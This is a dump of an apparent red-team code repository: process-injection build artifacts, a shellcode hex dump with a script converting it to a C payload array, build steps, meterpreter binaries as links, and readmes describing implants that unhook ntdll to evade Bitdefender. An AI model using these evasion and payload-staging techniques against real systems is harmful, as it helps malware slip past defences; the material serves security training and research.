/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "totIWlSrHR+s/eXPcnyaBqwVDT6uhdqNbTAl6ILr+g9i1VvqoIiI4ARBQFdwMuVgV3J/+vWZjp4rro2G2E4mfQ==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_NtMapViewOfSection\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_QueueUserAPC\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | a20789d862bd7d7720a906d34c758f8b54de7636
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "UgH6OIScwCTMo75t+Bb7MMmzMHyfpbovZJg01aBN5tOWC/vBgW/Xz9BZIfIFjdEDlr0+3rj0VELTK64tWo6i3Q==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_QueueUserAPC\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/Readme.md:
--------------------------------------------------------------------------------
1 | Much of this code is based on, or borrowed from, coursework for CRTO/CRTO II by Zero-Point Security (ZPS).
2 |
3 | For more information on the courses, see the ZPS course catalogue:
4 | https://training.zeropointsecurity.co.uk/collections
5 |
--------------------------------------------------------------------------------
/C/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C/code_exec/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C/code_exec/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/code_exec/system.bin
--------------------------------------------------------------------------------
/C/custom_payload/Readme.md:
--------------------------------------------------------------------------------
1 | All the files necessary to compile and run custom Linux payloads.
2 |
--------------------------------------------------------------------------------
/C/custom_payload/beautify.py:
--------------------------------------------------------------------------------
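#!/usr/bin/env python3
"""Format a hex dump as a C string-literal initialiser.

Reads ``dump.txt`` from the current directory (rows of hex digits, two digits
per byte) and prints ``unsigned char cmd[] = `` followed by one quoted row of
``\\xNN`` escapes per input row. The final row is terminated with ``;``.
"""

__author__ = "0xTriboulet"

_HEX_DIGITS = frozenset("0123456789abcdefABCDEF")


def format_c_array(lines):
    """Return the output lines for the given hex-dump rows.

    Args:
        lines: iterable of strings, each holding an even number of hex digits.
            Surrounding whitespace (the newline, or padding on a short final
            row) is ignored, and blank rows are skipped.

    Returns:
        A list of strings: the ``unsigned char cmd[] = `` header, then one
        double-quoted row of ``\\xNN`` escapes per data row, the last one
        ending in ``;``.

    Raises:
        ValueError: if a row has an odd number of digits or a non-hex
            character, or if there is no data at all. Emitting such a row
            would produce a malformed escape in the generated C source.
    """
    rows = []
    for number, raw in enumerate(lines, start=1):
        digits = raw.strip()
        if not digits:
            continue
        if len(digits) % 2 or not _HEX_DIGITS.issuperset(digits):
            raise ValueError(
                "line %d is not an even-length run of hex digits: %r" % (number, digits)
            )
        # Two digits per byte, each pair prefixed with a literal backslash-x.
        rows.append("".join("\\x" + digits[i:i + 2] for i in range(0, len(digits), 2)))

    if not rows:
        raise ValueError("no hex data found")

    out = ["unsigned char cmd[] = "]
    out.extend('"' + row + '"' for row in rows[:-1])
    # Only the final row closes the initialiser.
    out.append('"' + rows[-1] + '";')
    return out


if __name__ == "__main__":
    with open("dump.txt") as f:
        for text in format_c_array(f.readlines()):
            print(text)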
17 |
--------------------------------------------------------------------------------
/C/custom_payload/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me
--------------------------------------------------------------------------------
/C/custom_payload/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me.o
--------------------------------------------------------------------------------
/C/custom_payload/call_me_2.bak:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me_2.bak
--------------------------------------------------------------------------------
/C/custom_payload/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54883ec4848b82f7573722f6269
2 | 6e48ba2f6563686f000000488955d848
3 | 8945d0488d5dd053488d1c246a0048b8
4 | 5041594c4f41442048ba474f45532048
5 | 4552b94521000048894df0488955e848
6 | 8945e0488d4de05151488d3424488b3b
7 | ba00000000b83b0000000f05b83c0000
8 | 000f05002e7368737472746162002e74
9 | 657874000
10 |
--------------------------------------------------------------------------------
/C/custom_payload/how-to:
--------------------------------------------------------------------------------
1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3
2 | ld -m elf_x86_64 -N -s -o call_me call_me.o
3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt
4 | python beautify.py
5 | copy into payload section of system.c
6 | gcc -m64 -g system.c -o system.bin -O0
7 | ./system.bin
8 |
9 |
--------------------------------------------------------------------------------
/C/custom_payload/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/system.bin
--------------------------------------------------------------------------------
/C/custom_payload/useful.txt:
--------------------------------------------------------------------------------
1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200
2 |
--------------------------------------------------------------------------------
/C/meterpreter/Readme.md:
--------------------------------------------------------------------------------
1 | Repository of meterpreter binaries aimed at facilitating research
2 |
--------------------------------------------------------------------------------
/C/meterpreter/meterpreter_re_me.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/meterpreter_re_me.exe
--------------------------------------------------------------------------------
/C/meterpreter/patchmeup_meterpreter.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/patchmeup_meterpreter.exe
--------------------------------------------------------------------------------
/C/undetectable/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Build undetectable.exe from .\undetectable.c with the MinGW-w64 x86_64 GCC.
REM -l"ws2_32" links the Winsock 2 library; -Wdiscarded-qualifiers turns on
REM GCC's warning for pointer conversions that drop a type qualifier.
REM The compiler's exit code is not checked here.
x86_64-w64-mingw32-gcc.exe .\undetectable.c -o undetectable.exe -l"ws2_32" -Wdiscarded-qualifiers
--------------------------------------------------------------------------------
/C/undetectable/undetectable.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/undetectable/undetectable.exe
--------------------------------------------------------------------------------
/Certs/Certificate-Steve S.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Certificate-Steve S.pdf
--------------------------------------------------------------------------------
/Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf
--------------------------------------------------------------------------------
/Certs/Malware Development Advanced - Vol.1-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - Vol.1-certificate.pdf
--------------------------------------------------------------------------------
/Certs/Malware Development Advanced - Vol.2-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - Vol.2-certificate.pdf
--------------------------------------------------------------------------------
/Certs/RTMLS_2024-06-14.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/RTMLS_2024-06-14.pdf
--------------------------------------------------------------------------------
/Certs/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Certs/Red-Team-Ops-Completion.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-Completion.jpg
--------------------------------------------------------------------------------
/Certs/Red-Team-Ops-II-Completion.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-II-Completion.jpg
--------------------------------------------------------------------------------
/Certs/Sektor7_Malware Development Essentials-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development Essentials-certificate.pdf
--------------------------------------------------------------------------------
/Certs/Sektor7_Malware Development Intermediate-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development Intermediate-certificate.pdf
--------------------------------------------------------------------------------
/Certs/Sektor7_Windows Evasion-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Windows Evasion-certificate.pdf
--------------------------------------------------------------------------------
/Certs/THM-JrPenTester.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-JrPenTester.png
--------------------------------------------------------------------------------
/Certs/THM-Offensive_Pentesting.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Offensive_Pentesting.png
--------------------------------------------------------------------------------
/Certs/THM-Red_Team_Learning_Path.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Red_Team_Learning_Path.png
--------------------------------------------------------------------------------
/Certs/Udemy_Linux-PEAS.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Linux-PEAS.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Exploit-Dev.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Exploit-Dev.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Malware-Net-Java.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Malware-Net-Java.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Radare2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Radare2.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Windows-GUI.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Windows-GUI.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_Windows-PEAS.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Windows-PEAS.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_build_undetectable_malware_in_c.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_build_undetectable_malware_in_c.jpg
--------------------------------------------------------------------------------
/Certs/VHL_Advanced+_Certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Advanced+_Certificate.pdf
--------------------------------------------------------------------------------
/Certs/VHL_Basic_Certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Basic_Certificate.pdf
--------------------------------------------------------------------------------
/Certs/ZPS_DevOps_For_Pentesters.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/ZPS_DevOps_For_Pentesters.jpg
--------------------------------------------------------------------------------
/Certs/zps_initial_access_cert.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/zps_initial_access_cert.jpg
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/Readme.md:
--------------------------------------------------------------------------------
1 | Beats Bitdefender by unhooking with a clean copy of ntdll that is hardcoded into the binary. Unfortunately, it has to drop that copy of ntdll to disk before loading it; still working on a way around that.
2 |
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/beautify.py:
--------------------------------------------------------------------------------
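"""Print a file's bytes as a C ``unsigned char payload[]`` initializer.

Usage: beautify.py <file>

The array text is written to stdout. If the argument is missing or the file
cannot be read, a usage message is printed and the script exits with status 1
(the earlier version exited with status 0 on that error path).
"""
import sys


def to_c_array(data):
    """Return ``data`` (a bytes-like object) formatted as a C array definition.

    Each byte is written as unpadded lowercase hex (``0x1``, ``0x90``), the
    same digits the script produced before. An empty input yields an empty
    initializer instead of the stray ``0x`` token the old join emitted.
    """
    # bytearray() iterates as ints on both Python 2 and Python 3. The previous
    # hex(ord(x)) form raised TypeError on Python 3, where iterating over
    # bytes already yields ints.
    body = ', '.join('0x%x' % b for b in bytearray(data))
    return 'unsigned char payload[] = { ' + body + ' };'


if __name__ == "__main__":
    try:
        # Binary mode keeps the bytes untranslated; the context manager closes
        # the handle, which the bare open().read() left to the interpreter.
        with open(sys.argv[1], "rb") as fh:
            plaintext = fh.read()
    except (IndexError, IOError, OSError):
        # IndexError: no argument given. IOError/OSError: file not readable.
        # A bare except would also have swallowed KeyboardInterrupt.
        print("File argument needed! %s " % sys.argv[0])
        sys.exit(1)

    #open("payload.out",'wb').write(plaintext)
    print(to_c_array(plaintext))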
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implant.exe (64-bit console program) from the .cpp sources with MSVC.
REM   /nologo  suppress the compiler banner    /Od     disable optimization
REM   /MT      link the static C runtime       /W1     warning level 1
REM   /GS-     turn OFF the buffer security check (no stack cookies in the output)
REM   /DNDEBUG define NDEBUG                   /EHsc   standard C++ exception handling
REM   /Tp      treat the source argument that follows as C++
REM Everything after /link is passed to the linker (output name, subsystem, target machine).
cl.exe /nologo /Od /MT /W1 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
REM Delete the intermediate object files the compiler left behind.
del *.obj
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version1/implant.exe
--------------------------------------------------------------------------------
/Cpp/BYOdll/version2/Readme.md:
--------------------------------------------------------------------------------
1 | Beats BitDefender by unhooking all function calls by reloading ntdll hardcoded into the binary. ntdll is stored as a local variable in main so this program needs a BEEFY stack to manage it. This program suffers from the same limitation of dropping the hardcoded copy of ntdll to disk before loading.
2 |
--------------------------------------------------------------------------------
/Cpp/BYOdll/version2/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implant.exe (64-bit console program) from the .cpp sources with MSVC.
REM   /Ox      optimize for speed              /MT     link the static C runtime
REM   /W0      suppress all warnings           /GS-    turn OFF the buffer security check
REM   /DNDEBUG define NDEBUG                   /EHsc   standard C++ exception handling
REM   /STACK:4000000  linker option: reserve 4,000,000 bytes of stack. The Readme for
REM                   this version says a large buffer lives as a local in main, which
REM                   is why the reserve is raised above the linker default.
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:4000000
REM Delete the intermediate object files the compiler left behind.
del *.obj
--------------------------------------------------------------------------------
/Cpp/BYOdll/version2/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version2/implant.exe
--------------------------------------------------------------------------------
/Cpp/BYOdll/version3/Readme.md:
--------------------------------------------------------------------------------
1 | This version loads a reflective NTDLL, copies it over (overwrites) the hooked NTDLL, and is then free to execute malicious behaviors.
2 |
--------------------------------------------------------------------------------
/Cpp/BYOdll/version3/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Builds implant.exe (64-bit console program) from implant.cpp with MSVC.
REM   /Od  disable optimization      /MT   link the static C runtime
REM   /W0  suppress all warnings     /GS-  turn OFF the buffer security check
REM   /DNDEBUG define NDEBUG         /Tpimplant.cpp  compile implant.cpp as C++
REM Unlike the sibling build scripts, no /EHsc is passed and the .obj file is not deleted.
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/badAsm/badAsm.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm.exe
--------------------------------------------------------------------------------
/Cpp/badAsm/badAsm_better.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_better.exe
--------------------------------------------------------------------------------
/Cpp/badAsm/badAsm_rx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_rx.exe
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.log:
--------------------------------------------------------------------------------
1 | bad_fn_ptr.cpp
2 | Creating library C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.lib and object C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exp
3 | bad_fn_ptr.vcxproj -> C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe
4 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
